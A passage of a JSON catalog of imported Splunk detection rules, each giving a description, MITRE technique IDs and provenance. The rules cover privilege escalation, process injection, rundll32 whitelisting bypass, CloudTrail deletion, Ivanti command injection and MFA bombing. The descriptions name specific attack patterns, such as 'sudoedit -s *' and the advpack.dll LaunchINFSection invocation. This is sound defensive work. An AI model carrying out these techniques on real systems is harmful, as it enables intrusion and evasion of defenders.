Escalation", "description": "The following analytic detects the execution of Puppet commands with elevated privileges, specifically when Puppet is used to apply configurations with sudo rights. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it indicates a potential privilege escalation attempt, where a user could gain root access and execute system commands as the root user. 
If confirmed malicious, this could allow an attacker to fully compromise the system, execute arbitrary commands, and maintain persistent control.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-puppet-privilege-escalation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d19037f-466e-4d56-8d87-36fafd9aa3ce", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_puppet_privilege_escalation.yml" } }, { "id": "splunk-security-content-1d192a47-4bd3-4c06-902d-5dbe2375ec6d", "type": "detection", "name": "Cisco SD-WAN - Peering Activity", "description": "This analytic detects Cisco SD-WAN `control-connection-state-change` events where a control connection transitions.\nIt extracts and highlights key triage fields including `peer-type`, `peer-system-ip`, `public-ip`, and `public-port`.\nAnalysts should manually validate whether the `peer-system-ip` matches the expected SD-WAN addressing schema and\ndevice inventory, whether the event timing aligns with known operational activity (maintenance, failover, or\nplanned changes), and whether the `public-ip` is an expected source for control peering in the environment.\nTreat `peer-type:vmanage` events with higher scrutiny, especially when peer or source IP values are previously\nunseen.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], 
"log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-sd-wan-peering-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d192a47-4bd3-4c06-902d-5dbe2375ec6d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___peering_activity.yml" } }, { "id": "splunk-security-content-1d38e5e9-2ff8-4c47-872c-bf1657cefab5", "type": "detection", "name": "Windows Svchost.exe Parent Process Anomaly", "description": "The following analytic detects an anomaly where an svchost.exe process is spawned by a parent process other than the standard services.exe. In a typical Windows environment, svchost.exe is a system process that hosts Windows service DLLs, and is expected to be a child of services.exe. A process deviation from this hierarchy may indicate suspicious behavior, such as malicious code attempting to masquerade as a legitimate system process or evade detection. 
It is essential to investigate the parent process and associated behavior for further signs of compromise or unauthorized activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-svchost-exe-parent-process-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1d38e5e9-2ff8-4c47-872c-bf1657cefab5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_svchost_exe_parent_process_anomaly.yml" } }, { "id": "splunk-security-content-1dda7586-57be-4a1b-8de1-a9ad802b9a7f", "type": "detection", "name": "Windows Vulnerable Driver Installed", "description": "The following analytic detects the loading of known vulnerable Windows drivers, which may indicate potential persistence or privilege escalation attempts. It leverages Windows System service install EventCode 7045 to identify driver loading events and cross-references them with a list of vulnerable drivers. This activity is significant as attackers often exploit vulnerable drivers to gain elevated privileges or maintain persistence on a system. If confirmed malicious, this could allow attackers to execute arbitrary code with high privileges, leading to further system compromise and potential data exfiltration. 
This detection is a Windows Event Log adaptation of the Sysmon driver loaded detection written by Michael Haag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-vulnerable-driver-installed.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1dda7586-57be-4a1b-8de1-a9ad802b9a7f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_vulnerable_driver_installed.yml" } }, { "id": "splunk-security-content-1de31d5d-8fa6-4ee0-af89-17069134118a", "type": "detection", "name": "Detect Baron Samedit CVE-2021-3156 via OSQuery", "description": "The following analytic detects the execution of the \"sudoedit -s *\" command, which is associated with the Baron Samedit CVE-2021-3156 heap-based buffer overflow vulnerability. This detection leverages the `osquery_process` data source to identify instances where this specific command is run. This activity is significant because it indicates an attempt to exploit a known vulnerability that allows privilege escalation. 
If confirmed malicious, an attacker could gain full control of the system, execute arbitrary code, or access sensitive data, leading to potential data breaches and system disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1068" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/detect-baron-samedit-cve-2021-3156-via-osquery.yaml", "provenance": { "source": "splunk/security_content", "source_id": "1de31d5d-8fa6-4ee0-af89-17069134118a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_baron_samedit_cve_2021_3156_via_osquery.yml" } }, { "id": "splunk-security-content-1e1dedc6-f6f3-41a0-9dd7-a1245904fe75", "type": "detection", "name": "Windows Process Injection into Commonly Abused Processes", "description": "The following analytic detects process injection into executables that are commonly abused using Sysmon EventCode 10. It identifies suspicious GrantedAccess requests (0x40 and 0x1fffff) to processes such as notepad.exe, wordpad.exe and calc.exe, excluding common system paths like System32, Syswow64, and Program Files. This behavior is often associated with the SliverC2 framework by BishopFox. Monitoring this activity is crucial as it may indicate an initial payload attempting to execute malicious code. 
If confirmed malicious, this could allow attackers to execute arbitrary code, potentially leading to privilege escalation or persistent access within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-into-commonly-abused-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1e1dedc6-f6f3-41a0-9dd7-a1245904fe75", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_into_commonly_abused_processes.yml" } }, { "id": "splunk-security-content-1e45e6a8-110b-4886-b815-8d69cf35bf0a", "type": "detection", "name": "HTTP Request to Reserved Name on IIS Server", "description": "Detects attempts to exploit a request smuggling technique against IIS that leverages a Windows quirk where requests for reserved Windows device names such as \"/con\" trigger an early server response before the request body is received.\nWhen combined with a Content-Length desynchronization, this behavior can lead to a parsing confusion between frontend and backend.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001", "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-request-to-reserved-name-on-iis-server.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1e45e6a8-110b-4886-b815-8d69cf35bf0a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_request_to_reserved_name_on_iis_server.yml" } }, { "id": "splunk-security-content-1ecff169-26d7-4161-9a7b-2ac4c8e61bea", "type": "detection", "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic detects high-risk sign-in attempts against Azure Active Directory, identified by Azure Identity Protection. It leverages the RiskyUsers and UserRiskEvents log categories from Azure AD events ingested via EventHub. This activity is significant as it indicates potentially compromised accounts, flagged by heuristics and machine learning. If confirmed malicious, attackers could gain unauthorized access to sensitive resources, leading to data breaches or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110.003", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-active-directory-high-risk-sign-in.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ecff169-26d7-4161-9a7b-2ac4c8e61bea", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"detections/cloud/azure_active_directory_high_risk_sign_in.yml" } }, { "id": "splunk-security-content-1ef5dab0-e1f1-495d-a272-d134583c10b1", "type": "detection", "name": "Windows Application Whitelisting Bypass Attempt via Rundll32", "description": "The following analytic detects the execution of rundll32.exe calling one of the following DLLs:\n\n- Advpack.dll\n- Ieadvpack.dll\n- Syssetup.dll\n- Setupapi.dll\n\nwith one of the following functions: \"LaunchINFSection\", \"InstallHinfSection\", \"SetupInfObjectInstallAction\".\nThis method is identified through Endpoint Detection and Response (EDR) telemetry,\nfocusing on command-line executions and process details.\nThis activity is significant as it indicates a potential application\ncontrol or whitelisting bypass, allowing script code execution from a file.\nIf confirmed malicious, an attacker could execute arbitrary code, potentially leading to privilege escalation,\npersistence, or further network compromise.\nInvestigate the script content, network connections, and any spawned child processes for further context.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-application-whitelisting-bypass-attempt-via-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ef5dab0-e1f1-495d-a272-d134583c10b1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_application_whitelisting_bypass_attempt_via_rundll32.yml" } }, { "id": 
"splunk-security-content-1f0b47e5-0134-43eb-851c-e3258638945e", "type": "detection", "name": "ASL AWS Defense Evasion Delete Cloudtrail", "description": "The following analytic detects AWS `DeleteTrail` events within CloudTrail logs. It leverages Amazon Security Lake logs parsed in the Open Cybersecurity Schema Framework (OCSF) format to identify when a CloudTrail is deleted. This activity is significant because adversaries may delete CloudTrail logs to evade detection and operate with stealth. If confirmed malicious, this action could allow attackers to cover their tracks, making it difficult to trace their activities and investigate other potential compromises within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/asl-aws-defense-evasion-delete-cloudtrail.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f0b47e5-0134-43eb-851c-e3258638945e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/asl_aws_defense_evasion_delete_cloudtrail.yml" } }, { "id": "splunk-security-content-1f32a7e0-a060-4545-b7de-73fcf9ad536e", "type": "detection", "name": "Ivanti Connect Secure Command Injection Attempts", "description": "The following analytic identifies attempts to exploit the CVE-2023-46805 and CVE-2024-21887 vulnerabilities in Ivanti Connect Secure. It detects POST requests to specific URIs that leverage command injection to execute arbitrary commands. 
The detection uses the Web datamodel to monitor for these requests and checks for a 200 OK response, indicating a successful exploit attempt. This activity is significant as it can lead to unauthorized command execution on the server. If confirmed malicious, attackers could gain control over the system, leading to potential data breaches or further network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ivanti-connect-secure-command-injection-attempts.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f32a7e0-a060-4545-b7de-73fcf9ad536e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/ivanti_connect_secure_command_injection_attempts.yml" } }, { "id": "splunk-security-content-1f35e1da-267b-11ec-90a9-acde48001122", "type": "detection", "name": "Wscript Or Cscript Suspicious Child Process", "description": "This analytic identifies a suspicious process spawned by a WScript or CScript process. This technique is commonly used by adversaries and malware to execute various LOLBINs or other scripts such as PowerShell, or to spawn a suspended process and inject code into it as a defense evasion. 
This TTP may also match some normal scripts that use several of the application tools in its list of child processes, but it is a good pivot point and indicator that a script may be executing suspicious code.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055", "T1134.004", "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wscript-or-cscript-suspicious-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f35e1da-267b-11ec-90a9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wscript_or_cscript_suspicious_child_process.yml" } }, { "id": "splunk-security-content-1f44c126-c26a-4dd3-83bb-0f9a0f03ecc3", "type": "detection", "name": "Windows Scheduled Task with Suspicious Command", "description": "The following analytic detects the creation of scheduled tasks designed to execute commands using native Windows shells like PowerShell, Cmd, Wscript, or Cscript or from public folders such as Users, Temp, or ProgramData. It leverages Windows Security EventCode 4698, 4700, and 4702 to identify when such tasks are registered, enabled, or modified. This activity is significant as it may indicate an attempt to establish persistence or execute malicious commands on a system. 
If confirmed malicious, this could allow an attacker to maintain access, execute arbitrary code, or escalate privileges, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1053.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scheduled-task-with-suspicious-command.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f44c126-c26a-4dd3-83bb-0f9a0f03ecc3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scheduled_task_with_suspicious_command.yml" } }, { "id": "splunk-security-content-1f57f10e-1dc5-47ea-852c-2e85b2503d79", "type": "detection", "name": "Cisco Secure Firewall - Repeated Blocked Connections", "description": "The following analytic detects repeated blocked connection attempts from the same initiator to the same responder within a short time window. It leverages Cisco Secure Firewall Threat Defense logs and identifies connections where the action is set to Block, and the number of occurrences reaches or exceeds a threshold of ten within a one-minute span. This pattern may indicate a misconfigured application, unauthorized access attempts, or early stages of a brute-force or scanning operation. 
If confirmed malicious, this behavior may represent an attacker probing the network, attempting lateral movement, or testing firewall rules for weaknesses.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018", "T1046", "T1110", "T1203", "T1595.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-repeated-blocked-connections.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f57f10e-1dc5-47ea-852c-2e85b2503d79", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___repeated_blocked_connections.yml" } }, { "id": "splunk-security-content-1f5b68aa-2037-11ec-898e-acde48001122", "type": "detection", "name": "Print Processor Registry Autostart", "description": "The following analytic detects suspicious modifications or new entries in the Print Processor registry path. It leverages registry activity data from the Endpoint data model to identify changes in the specified registry path. This activity is significant because the Print Processor registry is known to be exploited by APT groups like Turla for persistence and privilege escalation. 
If confirmed malicious, this could allow an attacker to execute a malicious DLL payload by restarting the spoolsv.exe process, leading to potential control over the compromised machine.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.012" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/print-processor-registry-autostart.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f5b68aa-2037-11ec-898e-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/print_processor_registry_autostart.yml" } }, { "id": "splunk-security-content-1f77661a-0fe3-4b8d-a62c-7dff06906d26", "type": "detection", "name": "Windows Suspicious VMWare Tools Child Process", "description": "The following analytic identifies child processes spawned by vmtoolsd.exe, the VMWare Tools service in Windows, which typically runs with SYSTEM privileges. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process and parent process relationships. Monitoring this activity is crucial as it can indicate exploitation attempts, such as CVE-2023-20867. 
If confirmed malicious, attackers could gain SYSTEM-level access, allowing them to execute arbitrary code, escalate privileges, and potentially compromise the entire system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-suspicious-vmware-tools-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1f77661a-0fe3-4b8d-a62c-7dff06906d26", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_suspicious_vmware_tools_child_process.yml" } }, { "id": "splunk-security-content-1fca2b28-f922-11eb-b2dd-acde48001122", "type": "detection", "name": "Uninstall App Using MsiExec", "description": "The following analytic detects the uninstallation of applications using msiexec with specific command-line arguments. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant because it is an uncommon practice in enterprise environments and has been associated with malicious behavior, such as disabling antivirus software. 
If confirmed malicious, this could allow an attacker to remove security software, potentially leading to further compromise and persistence within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/uninstall-app-using-msiexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fca2b28-f922-11eb-b2dd-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/uninstall_app_using_msiexec.yml" } }, { "id": "splunk-security-content-1fdd164a-def8-4762-83a9-9ffe24e74d5a", "type": "detection", "name": "AWS Excessive Security Scanning", "description": "The following analytic identifies excessive security scanning activities in AWS by detecting a high number of Describe, List, or Get API calls from a single user. It leverages AWS CloudTrail logs to count distinct event names and flags users with more than 50 such events. This behavior is significant as it may indicate reconnaissance activities by an attacker attempting to map out your AWS environment. 
If confirmed malicious, this could lead to unauthorized access, data exfiltration, or further exploitation of your cloud infrastructure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-excessive-security-scanning.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fdd164a-def8-4762-83a9-9ffe24e74d5a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_excessive_security_scanning.yml" } }, { "id": "splunk-security-content-1fdf31c9-ff4d-4c48-b799-0e8666e08787", "type": "detection", "name": "Windows Indirect Command Execution Via forfiles", "description": "The following analytic detects the execution of programs initiated by forfiles.exe. This command is typically used to run commands on multiple files, often within batch scripts. The detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where forfiles.exe is the parent process. This activity is significant because forfiles.exe can be exploited to bypass command line execution protections, making it a potential vector for malicious activity. 
If confirmed malicious, this could allow attackers to execute arbitrary commands, potentially leading to unauthorized access or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1202" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-indirect-command-execution-via-forfiles.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fdf31c9-ff4d-4c48-b799-0e8666e08787", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_indirect_command_execution_via_forfiles.yml" } }, { "id": "splunk-security-content-1fece617-e614-4329-9e61-3ba228c0f353", "type": "detection", "name": "AWS Multiple Failed MFA Requests For User", "description": "The following analytic identifies multiple failed multi-factor authentication (MFA) requests to an AWS Console for a single user. It leverages AWS CloudTrail logs, specifically the `additionalEventData` field, to detect more than 10 failed MFA prompts within 5 minutes. This activity is significant as it may indicate an adversary attempting to bypass MFA by bombarding the user with repeated authentication requests. 
If confirmed malicious, this could lead to unauthorized access to the AWS environment, potentially compromising sensitive data and resources.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1586.003", "T1621" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-multiple-failed-mfa-requests-for-user.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1fece617-e614-4329-9e61-3ba228c0f353", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_multiple_failed_mfa_requests_for_user.yml" } }, { "id": "splunk-security-content-1ff7ccc8-065a-11ec-91e4-acde48001122", "type": "detection", "name": "Get ADDefaultDomainPasswordPolicy with Powershell Script Block", "description": "The following analytic detects the execution of the `Get-ADDefaultDomainPasswordPolicy` PowerShell cmdlet, which is used to retrieve the password policy in a Windows domain. This detection leverages PowerShell Script Block Logging (EventCode=4104) to identify the specific command execution. Monitoring this activity is significant as it can indicate an attempt to gather domain policy information, which is often a precursor to further malicious actions. 
If confirmed malicious, this activity could allow an attacker to understand password policies, aiding in password attacks or further domain enumeration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-addefaultdomainpasswordpolicy-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ff7ccc8-065a-11ec-91e4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_addefaultdomainpasswordpolicy_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-1ff9eb9a-7d72-4993-a55e-59a839e607f1", "type": "detection", "name": "Internal Horizontal Port Scan", "description": "This analytic identifies instances where an internal host has attempted to communicate with 250 or more destination IP addresses using the same port and protocol. Horizontal port scans from internal hosts can indicate reconnaissance or scanning activities, potentially signaling malicious intent or misconfiguration. 
By monitoring network traffic logs, this detection helps detect and respond to such behavior promptly, enhancing network security and preventing potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1046" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/internal-horizontal-port-scan.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "1ff9eb9a-7d72-4993-a55e-59a839e607f1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/internal_horizontal_port_scan.yml" } }, { "id": "splunk-security-content-201022d7-a35c-470a-93ff-ae335c42e69d", "type": "detection", "name": "Cisco SD-WAN - Uncommon User-Agent Multi-URI Activity", "description": "This hunting search is designed to surface source IP activity using uncommon HTTP user-agents across multiple URI paths in Cisco SD-WAN Manager serviceproxy access logs.\nIt looks for source and user-agent combinations that access more than one distinct URI, then keeps only low-volume behavior (`requests<=50`) to reduce noise from normal high-volume traffic.\nUse this hunt to pivot on `http_user_agent` and `src` and identify possible automation, scripted reconnaissance, or exploitation attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/cisco-sd-wan-uncommon-user-agent-multi-uri-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "201022d7-a35c-470a-93ff-ae335c42e69d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_sd_wan___uncommon_user_agent_multi_uri_activity.yml" } }, { "id": "splunk-security-content-2015de95-fe91-413d-9d62-2fe011b67e82", "type": "detection", "name": "Windows Archive Collected Data via Rar", "description": "The following analytic identifies the execution of RAR utilities to archive files on a system. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names, GUIDs, and command-line arguments. This activity is significant as threat actors, including red-teamers and malware like DarkGate, use RAR archiving to compress and exfiltrate collected data from compromised hosts. 
